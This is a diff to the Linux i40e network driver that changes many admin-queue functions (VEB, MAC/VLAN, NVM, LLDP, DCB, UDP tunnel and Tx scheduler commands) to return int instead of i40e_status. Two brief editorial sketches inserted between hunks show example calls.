++	int status = 0;
+ 
+ 	if (hw->phy.get_link_info) {
+ 		status = i40e_update_link_info(hw);
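The converted i40e_get_link_status() keeps its bool out-parameter but now
returns int, and per the kernel-doc above enables LinkStatusEvent reporting
as a side effect. A short illustrative call (editorial sketch; hw is
assumed valid and pr_info() merely stands in for the caller's real logging):

	static void example_report_link(struct i40e_hw *hw)
	{
		bool link_up = false;
		int err = i40e_get_link_status(hw, &link_up);

		if (err)
			pr_info("i40e: link status query failed: %d\n", err);
		else
			pr_info("i40e: link is %s\n", link_up ? "up" : "down");
	}
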
+@@ -2509,10 +2364,10 @@ i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up)
+  * i40e_update_link_info - update status of the HW network link
+  * @hw: pointer to the hw struct
+  **/
+-noinline_for_stack i40e_status i40e_update_link_info(struct i40e_hw *hw)
++noinline_for_stack int i40e_update_link_info(struct i40e_hw *hw)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	status = i40e_aq_get_link_info(hw, true, NULL, NULL);
+ 	if (status)
+@@ -2559,19 +2414,19 @@ noinline_for_stack i40e_status i40e_update_link_info(struct i40e_hw *hw)
+  * This asks the FW to add a VEB between the uplink and downlink
+  * elements.  If the uplink SEID is 0, this will be a floating VEB.
+  **/
+-i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+-				u16 downlink_seid, u8 enabled_tc,
+-				bool default_port, u16 *veb_seid,
+-				bool enable_stats,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
++		    u16 downlink_seid, u8 enabled_tc,
++		    bool default_port, u16 *veb_seid,
++		    bool enable_stats,
++		    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_veb *cmd =
+ 		(struct i40e_aqc_add_veb *)&desc.params.raw;
+ 	struct i40e_aqc_add_veb_completion *resp =
+ 		(struct i40e_aqc_add_veb_completion *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 veb_flags = 0;
++	int status;
+ 
+ 	/* SEIDs need to either both be set or both be 0 for floating VEB */
+ 	if (!!uplink_seid != !!downlink_seid)
+@@ -2617,17 +2472,17 @@ i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+  * This retrieves the parameters for a particular VEB, specified by
+  * uplink_seid, and returns them to the caller.
+  **/
+-i40e_status i40e_aq_get_veb_parameters(struct i40e_hw *hw,
+-				u16 veb_seid, u16 *switch_id,
+-				bool *floating, u16 *statistic_index,
+-				u16 *vebs_used, u16 *vebs_free,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_veb_parameters(struct i40e_hw *hw,
++			       u16 veb_seid, u16 *switch_id,
++			       bool *floating, u16 *statistic_index,
++			       u16 *vebs_used, u16 *vebs_free,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_veb_parameters_completion *cmd_resp =
+ 		(struct i40e_aqc_get_veb_parameters_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (veb_seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -2711,7 +2566,7 @@ i40e_prepare_add_macvlan(struct i40e_aqc_add_macvlan_element_data *mv_list,
+  *
+  * Add MAC/VLAN addresses to the HW filtering
+  **/
+-i40e_status
++int
+ i40e_aq_add_macvlan(struct i40e_hw *hw, u16 seid,
+ 		    struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		    u16 count, struct i40e_asq_cmd_details *cmd_details)
+@@ -2743,7 +2598,7 @@ i40e_aq_add_macvlan(struct i40e_hw *hw, u16 seid,
+  * It also calls _v2 versions of asq_send_command functions to
+  * get the aq_status on the stack.
+  **/
+-i40e_status
++int
+ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 		       struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		       u16 count, struct i40e_asq_cmd_details *cmd_details,
+@@ -2771,15 +2626,16 @@ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+  *
+  * Remove MAC/VLAN addresses from the HW filtering
+  **/
+-i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
+-			struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			u16 count, struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
++		       struct i40e_aqc_remove_macvlan_element_data *mv_list,
++		       u16 count, struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_macvlan *cmd =
+ 		(struct i40e_aqc_macvlan *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buf_size;
++	int status;
+ 
+ 	if (count == 0 || !mv_list || !hw)
+ 		return I40E_ERR_PARAM;
+@@ -2818,7 +2674,7 @@ i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 seid,
+  * It also calls _v2 versions of asq_send_command functions to
+  * get the aq_status on the stack.
+  **/
+-i40e_status
++int
+ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_remove_macvlan_element_data *mv_list,
+ 			  u16 count, struct i40e_asq_cmd_details *cmd_details,
+@@ -2866,19 +2722,19 @@ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+  * Add/Delete a mirror rule to a specific switch. Mirror rules are supported for
+  * VEBs/VEPA elements only
+  **/
+-static i40e_status i40e_mirrorrule_op(struct i40e_hw *hw,
+-				u16 opcode, u16 sw_seid, u16 rule_type, u16 id,
+-				u16 count, __le16 *mr_list,
+-				struct i40e_asq_cmd_details *cmd_details,
+-				u16 *rule_id, u16 *rules_used, u16 *rules_free)
++static int i40e_mirrorrule_op(struct i40e_hw *hw,
++			      u16 opcode, u16 sw_seid, u16 rule_type, u16 id,
++			      u16 count, __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rule_id, u16 *rules_used, u16 *rules_free)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_delete_mirror_rule *cmd =
+ 		(struct i40e_aqc_add_delete_mirror_rule *)&desc.params.raw;
+ 	struct i40e_aqc_add_delete_mirror_rule_completion *resp =
+ 	(struct i40e_aqc_add_delete_mirror_rule_completion *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buf_size;
++	int status;
+ 
+ 	buf_size = count * sizeof(*mr_list);
+ 
+@@ -2926,10 +2782,11 @@ static i40e_status i40e_mirrorrule_op(struct i40e_hw *hw,
+  *
+  * Add mirror rule. Mirror rules are supported for VEBs or VEPA elements only
+  **/
+-i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rule_id, u16 *rules_used, u16 *rules_free)
++int i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			   u16 rule_type, u16 dest_vsi, u16 count,
++			   __le16 *mr_list,
++			   struct i40e_asq_cmd_details *cmd_details,
++			   u16 *rule_id, u16 *rules_used, u16 *rules_free)
+ {
+ 	if (!(rule_type == I40E_AQC_MIRROR_RULE_TYPE_ALL_INGRESS ||
+ 	    rule_type == I40E_AQC_MIRROR_RULE_TYPE_ALL_EGRESS)) {
+@@ -2957,10 +2814,11 @@ i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+  *
+  * Delete a mirror rule. Mirror rules are supported for VEBs/VEPA elements only
+  **/
+-i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rules_used, u16 *rules_free)
++int i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			      u16 rule_type, u16 rule_id, u16 count,
++			      __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rules_used, u16 *rules_free)
+ {
+ 	/* Rule ID has to be valid except rule_type: INGRESS VLAN mirroring */
+ 	if (rule_type == I40E_AQC_MIRROR_RULE_TYPE_VLAN) {
+@@ -2989,14 +2847,14 @@ i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+  *
+  * send msg to vf
+  **/
+-i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+-				u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
++			   u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_pf_vf_message *cmd =
+ 		(struct i40e_aqc_pf_vf_message *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_send_msg_to_vf);
+ 	cmd->id = cpu_to_le32(vfid);
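i40e_aq_send_msg_to_vf() above carries a PF-to-VF mailbox message through
the admin queue. A minimal sketch using only the signature shown in this
hunk (example_notify_vf is hypothetical; the opcode and retval values are
assumed to come from the driver's virtchnl layer):

	static int example_notify_vf(struct i40e_hw *hw, u16 vfid,
				     u32 v_opcode, u32 v_retval)
	{
		/* Zero-length message: msg == NULL, msglen == 0, and NULL
		 * for default command details.
		 */
		return i40e_aq_send_msg_to_vf(hw, vfid, v_opcode, v_retval,
					      NULL, 0, NULL);
	}
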
+@@ -3024,14 +2882,14 @@ i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+  *
+  * Read the register using the admin queue commands
+  **/
+-i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
++int i40e_aq_debug_read_register(struct i40e_hw *hw,
+ 				u32 reg_addr, u64 *reg_val,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_reg_read_write *cmd_resp =
+ 		(struct i40e_aqc_debug_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (reg_val == NULL)
+ 		return I40E_ERR_PARAM;
+@@ -3059,14 +2917,14 @@ i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
+  *
+  * Write to a register using the admin queue commands
+  **/
+-i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+-					u32 reg_addr, u64 reg_val,
+-					struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_debug_write_register(struct i40e_hw *hw,
++				 u32 reg_addr, u64 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_reg_read_write *cmd =
+ 		(struct i40e_aqc_debug_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_debug_write_reg);
+ 
+@@ -3090,16 +2948,16 @@ i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+  *
+  * requests common resource using the admin queue commands
+  **/
+-i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				enum i40e_aq_resource_access_type access,
+-				u8 sdp_number, u64 *timeout,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_request_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     enum i40e_aq_resource_access_type access,
++			     u8 sdp_number, u64 *timeout,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_request_resource *cmd_resp =
+ 		(struct i40e_aqc_request_resource *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_request_resource);
+ 
+@@ -3129,15 +2987,15 @@ i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+  *
+  * release common resource using the admin queue commands
+  **/
+-i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				u8 sdp_number,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_release_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     u8 sdp_number,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_request_resource *cmd =
+ 		(struct i40e_aqc_request_resource *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_release_resource);
+ 
+@@ -3161,15 +3019,15 @@ i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+  *
+  * Read the NVM using the admin queue commands
+  **/
+-i40e_status i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
++		     u32 offset, u16 length, void *data,
++		     bool last_command,
++		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3207,14 +3065,14 @@ i40e_aq_read_nvm_exit:
+  *
+  * Erase the NVM sector using the admin queue commands
+  **/
+-i40e_status i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			      u32 offset, u16 length, bool last_command,
+-			      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
++		      u32 offset, u16 length, bool last_command,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3255,8 +3113,8 @@ static void i40e_parse_discover_capabilities(struct i40e_hw *hw, void *buff,
+ 	u32 number, logical_id, phys_id;
+ 	struct i40e_hw_capabilities *p;
+ 	u16 id, ocp_cfg_word0;
+-	i40e_status status;
+ 	u8 major_rev;
++	int status;
+ 	u32 i = 0;
+ 
+ 	cap = (struct i40e_aqc_list_capabilities_element_resp *) buff;
+@@ -3497,14 +3355,14 @@ static void i40e_parse_discover_capabilities(struct i40e_hw *hw, void *buff,
+  *
+  * Get the device capabilities descriptions from the firmware
+  **/
+-i40e_status i40e_aq_discover_capabilities(struct i40e_hw *hw,
+-				void *buff, u16 buff_size, u16 *data_size,
+-				enum i40e_admin_queue_opc list_type_opc,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_discover_capabilities(struct i40e_hw *hw,
++				  void *buff, u16 buff_size, u16 *data_size,
++				  enum i40e_admin_queue_opc list_type_opc,
++				  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_list_capabilites *cmd;
+ 	struct i40e_aq_desc desc;
+-	i40e_status status = 0;
++	int status = 0;
+ 
+ 	cmd = (struct i40e_aqc_list_capabilites *)&desc.params.raw;
+ 
+@@ -3546,15 +3404,15 @@ exit:
+  *
+  * Update the NVM using the admin queue commands
+  **/
+-i40e_status i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			       u32 offset, u16 length, void *data,
+-				bool last_command, u8 preservation_flags,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
++		       u32 offset, u16 length, void *data,
++		       bool last_command, u8 preservation_flags,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_nvm_update *cmd =
+ 		(struct i40e_aqc_nvm_update *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	/* In offset the highest byte must be zeroed. */
+ 	if (offset & 0xFF000000) {
+@@ -3599,13 +3457,13 @@ i40e_aq_update_nvm_exit:
+  *
+  * Rearrange NVM structure, available only for transition FW
+  **/
+-i40e_status i40e_aq_rearrange_nvm(struct i40e_hw *hw,
+-				  u8 rearrange_nvm,
+-				  struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rearrange_nvm(struct i40e_hw *hw,
++			  u8 rearrange_nvm,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_nvm_update *cmd;
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_nvm_update *)&desc.params.raw;
+ 
+@@ -3639,17 +3497,17 @@ i40e_aq_rearrange_nvm_exit:
+  *
+  * Requests the complete LLDP MIB (entire packet).
+  **/
+-i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+-				u8 mib_type, void *buff, u16 buff_size,
+-				u16 *local_len, u16 *remote_len,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 u16 *local_len, u16 *remote_len,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_get_mib *cmd =
+ 		(struct i40e_aqc_lldp_get_mib *)&desc.params.raw;
+ 	struct i40e_aqc_lldp_get_mib *resp =
+ 		(struct i40e_aqc_lldp_get_mib *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -3689,14 +3547,14 @@ i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+  *
+  * Set the LLDP MIB.
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+ 		     u8 mib_type, void *buff, u16 buff_size,
+ 		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_lldp_set_local_mib *cmd;
+-	enum i40e_status_code status;
+ 	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_lldp_set_local_mib *)&desc.params.raw;
+ 	if (buff_size == 0 || !buff)
+@@ -3728,14 +3586,14 @@ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+  * Enable or Disable posting of an event on ARQ when LLDP MIB
+  * associated with the interface changes
+  **/
+-i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+-				bool enable_update,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
++				      bool enable_update,
++				      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_update_mib *cmd =
+ 		(struct i40e_aqc_lldp_update_mib *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_update_mib);
+ 
+@@ -3757,14 +3615,14 @@ i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+  * Restore LLDP Agent factory settings if @restore set to True. In other case
+  * only returns factory setting in AQ response.
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+ 		     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_restore *cmd =
+ 		(struct i40e_aqc_lldp_restore *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!(hw->flags & I40E_HW_FLAG_FW_LLDP_PERSISTENT)) {
+ 		i40e_debug(hw, I40E_DEBUG_ALL,
+@@ -3794,14 +3652,14 @@ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+  *
+  * Stop or Shutdown the embedded LLDP Agent
+  **/
+-i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+-				bool persist,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
++		      bool persist,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_stop *cmd =
+ 		(struct i40e_aqc_lldp_stop *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_stop);
+ 
+@@ -3829,13 +3687,13 @@ i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+  *
+  * Start the embedded LLDP Agent on all ports.
+  **/
+-i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_lldp_start *cmd =
+ 		(struct i40e_aqc_lldp_start *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_lldp_start);
+ 
+@@ -3861,14 +3719,14 @@ i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
+  * @dcb_enable: True if DCB configuration needs to be applied
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_set_dcb_parameters(struct i40e_hw *hw, bool dcb_enable,
+ 			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_dcb_parameters *cmd =
+ 		(struct i40e_aqc_set_dcb_parameters *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!(hw->flags & I40E_HW_FLAG_FW_LLDP_STOPPABLE))
+ 		return I40E_ERR_DEVICE_NOT_SUPPORTED;
+@@ -3894,12 +3752,12 @@ i40e_aq_set_dcb_parameters(struct i40e_hw *hw, bool dcb_enable,
+  *
+  * Get CEE DCBX mode operational configuration from firmware
+  **/
+-i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+-				       void *buff, u16 buff_size,
+-				       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
++			       void *buff, u16 buff_size,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -3925,17 +3783,17 @@ i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+  * and this function will call cpu_to_le16 to convert from Host byte order to
+  * Little Endian order.
+  **/
+-i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+-				u16 udp_port, u8 protocol_index,
+-				u8 *filter_index,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
++			   u16 udp_port, u8 protocol_index,
++			   u8 *filter_index,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_udp_tunnel *cmd =
+ 		(struct i40e_aqc_add_udp_tunnel *)&desc.params.raw;
+ 	struct i40e_aqc_del_udp_tunnel_completion *resp =
+ 		(struct i40e_aqc_del_udp_tunnel_completion *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_add_udp_tunnel);
+ 
+@@ -3956,13 +3814,13 @@ i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+  * @index: filter index
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_remove_udp_tunnel *cmd =
+ 		(struct i40e_aqc_remove_udp_tunnel *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_del_udp_tunnel);
+ 
+@@ -3981,13 +3839,13 @@ i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+  *
+  * This deletes a switch element from the switch.
+  **/
+-i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_switch_seid *cmd =
+ 		(struct i40e_aqc_switch_seid *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -4011,11 +3869,11 @@ i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+  * recomputed and modified. The retval field in the descriptor
+  * will be set to 0 when RPB is modified.
+  **/
+-i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_dcb_updated(struct i40e_hw *hw,
++			struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_dcb_updated);
+ 
+@@ -4035,15 +3893,15 @@ i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+  *
+  * Generic command handler for Tx scheduler AQ commands
+  **/
+-static i40e_status i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
++static int i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
+ 				void *buff, u16 buff_size,
+-				 enum i40e_admin_queue_opc opcode,
++				enum i40e_admin_queue_opc opcode,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_tx_sched_ind *cmd =
+ 		(struct i40e_aqc_tx_sched_ind *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 	bool cmd_param_flag = false;
+ 
+ 	switch (opcode) {
+@@ -4093,14 +3951,14 @@ static i40e_status i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
+  * @max_credit: Max BW limit credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
++int i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+ 				u16 seid, u16 credit, u8 max_credit,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_configure_vsi_bw_limit *cmd =
+ 		(struct i40e_aqc_configure_vsi_bw_limit *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_configure_vsi_bw_limit);
+@@ -4121,10 +3979,10 @@ i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+  * @bw_data: Buffer holding enabled TCs, relative TC BW limit/credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
++			     u16 seid,
++			     struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_configure_vsi_tc_bw,
+@@ -4139,11 +3997,12 @@ i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
+  * @opcode: Tx scheduler AQ command opcode
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
+-		enum i40e_admin_queue_opc opcode,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
++			       u16 seid,
++			       struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
++			       enum i40e_admin_queue_opc opcode,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)ets_data,
+ 				    sizeof(*ets_data), opcode, cmd_details);
+@@ -4156,7 +4015,8 @@ i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
